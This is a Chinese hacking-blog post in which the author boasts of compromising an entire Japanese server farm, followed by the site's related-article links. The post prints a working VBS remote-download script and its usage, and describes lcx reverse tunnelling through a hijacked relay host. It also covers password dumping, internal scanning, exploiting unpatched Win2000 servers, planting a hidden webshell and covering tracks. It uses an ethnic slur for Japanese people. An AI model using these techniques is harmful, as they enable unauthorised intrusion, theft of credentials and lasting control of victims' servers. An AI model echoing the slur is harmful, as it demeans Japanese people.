渗透获取整个服务器群权限的实例
因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^
开局:
入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。
以下是引用片段:
down.vbs
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
use: cscript down.vbs http://ip/lcx.exe lcx.exe (路径默认在system32下)
这个下载脚本可以重复使用,也不会暴露我存放工具的地址。(有些下载脚本把下载地址写在里面,个人觉得不很好。)
由于本机连接日本网络比较慢。连拨两个VPN,再登上日本本土的一台肉鸡(我想这样速度不会差了,ps:肉鸡的作用体现出来了)。
加了用户。在肉鸡终端:lcx -listen 520 1982,目标机:lcx -slave myip 520 127.0.0.1 3389
ok,终端里填:127.0.0.1:1982 顺利登陆。
中盘:
win2000系统,mssql server
先抓个系统密码,找下sql密码。查看了下一些信息,并检查是否还有同行的后门,清除之。
分析了下密码:(数字+机器名+数字)
其他都是鸟语也看不太明白。载了几个基本工具放个隐藏目录。
ps:一般进去后总得收拾下,最好不要种马。死得快,也易暴露。
这时候就盘算着怎么拿web的权限了。(分析网络拓扑结构了)
先看下网上邻居:
workgroup
C**SQL2006
B**-DB
B***TENDB
....
很明显,都是数据库服务器。
再往上一层,又发现一个工作组:
web-k.**.jp
c***oo_db
...
日,还是数据库服务器。
ipconfig /all
192.168.10.18 只有一个内网ip
ok:s tcp 192.168.10.1 192.168.10.254 80 20 /save
用s扫下内网开80的机子,线程设置为20,讲究精确度嘛。
很遗憾,结果出来的几个机子都是数据库服务器,上面并没有网站。
我就纳闷了,web服务器跑哪了呢?
收官:
翻了一阵子,仔细分析了网络拓扑结构。最后让我找到了:
192.168.1.1-255这段是web服务器群
接下来,用s果然扫出一片。再对应外网ip,挑选溢出的下手对象(192.168.1.19)(倭奴喜欢古董级的win2000,好多补丁都不全,好溢出)
很舒坦地日下来,然后载个webshell放到web目录的偏僻角落。擦擦屁股走人。
ps:图是我溢出另外一台数据库服务器时截下的
什么是phpddos流量攻击?phpddos流量攻击怎么处理?
这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽带
详情2018-01-24 18:05:55责编:llp 来源:驱动管家怎么避免网站被黑?网站被黑之后如何处理?
每当出现欧洲杯、世界杯、奥运会这种比赛时,各种博彩集团使出浑身解数黑掉正常的网站,尤其是流量大的资讯类网站。百度通过内部检测发现欧洲杯期间站点被黑数量呈上升趋势,百度已经加大惩罚效率和力度,那么,
详情2018-01-23 19:24:40责编:llp 来源:驱动管家一种win9x下的入侵方法:先要取得对方ip地址
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比
详情2018-02-08 15:34:07责编:llp 来源:驱动管家反arp攻击:局域网怎么隔离感染arp病毒的电脑?
局域网如何隔离感染ARP病毒的电脑呢?以下就是具体的实现方法。方法 步骤局域网电脑是否存在ARP攻击的查看方法:点击“开始”-“程序”-“附件”-“运行”项来打开“运行“窗口,或者按”Windows+R“来打开,输入
详情2018-01-23 10:24:04责编:llp 来源:驱动管家iphoto有什么功能?iphoto的格式串漏洞怎么修复?
受影响系统:Apple iPhoto & 39;08 7 1不受影响系统:Apple iPhoto 7 1 2描述:BUGTRAQ ID: 27636CVE(CAN) ID: CVE-2008-0043iPhoto是用于导入、组织和共享数码照片的工具。iPhoto在处理photocast订阅时
详情2018-01-26 17:35:10责编:llp 来源:驱动管家dedecms v5漏洞描述 dedecms v5漏洞如何检测?
DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2 1开始,DedeCms人气急却上升,成为国内
详情2018-02-25 18:03:05责编:llp 来源:驱动管家有哪些密码存储方式能保证密码保存不泄露?
密码是软件系统中非常常见的属性,密码保存和传递都需要考虑如何才能不泄漏。密码存储密码在服务器都需要加密保存,根据用途不一样,有可逆加密(AES)和非可逆加密(PBKDF2)算法。可逆加密方式存储可逆加密一般
详情2018-02-28 15:41:21责编:llp 来源:驱动管家txt文件能挂马?txt文件如何挂马?
我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马 txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的说 如果有人给你发个一个类似http: www xxx com test txt的链接,你敢不敢打开?如果你觉
详情2018-02-11 17:24:56责编:llp 来源:驱动管家数据加密技术 动态加密的相关知识介绍
随着计算机和网络技术的飞速发展,越来越多的信息以电子形式存储在个人和商用电脑中,并且通过网络进行广泛地传递,在大量的信息存储和交换中,信息的安全问题越来越引起人们的重视。信息保密的理论基础是密码学
详情2018-02-09 12:23:03责编:llp 来源:驱动管家入侵教程 谈谈主要的论坛攻击方法和防范手段
目前网上有种新的趋势,黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所,而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同,因此对大家的网络安全威胁非常大。换个角度来说,黑客们通过入
详情2018-01-28 13:50:21责编:llp 来源:驱动管家
- 应用汇安卓游戏助手使用方法的详细介绍
- pp越狱助手怎么进行越狱?pp越狱助手越狱的步骤详解
- 支持4g网络的手机:飞利浦i996跑分成绩是多少?
- 看星星一号的跑分就知道星星一号的性能好不好?
- 尝试破解efs加密:使用PsExec IceSword破解
- 修复Win10下录制DX11游戏不能正常显示帧数 高清录屏Bandicam 2.3下载
- 腾讯手机助手V2.0版本怎么样?腾讯手机助手新版本介绍
- 苹果6怎么贴手机膜?弧面屏苹果6贴膜方法
- 中兴axon有了眼纹识别功能?中兴axon如何设置眼纹识别?
- web data分离如何拿到完整数据库文件?
- 2291游戏浏览器能不能开启分屏?怎么开启游戏分屏
- 使用迅雷资源助手怎么快速下载电影资源?
- 服务器无需密码就能获取管理员权限 思科发布更新版本修复漏洞
- 跳一跳小游戏同时在线人数高达2800万人每小时
- 美国一未成年学生发布威胁言论而遭逮捕
- 中兴u988s和小米3的区别 买中兴u988s还是小米3?
- 联想手机a600配置 联想手机a600搭配什么处理器?
- cmd下加sql账号和密码的方法 如何入侵IPC$?
- 免费开源文件压缩/解压管理工具7-Zip 15.06 Beta官方下载 支持RAR5格式文件
- 360手机助手下载的文件可以自定义存放目录吗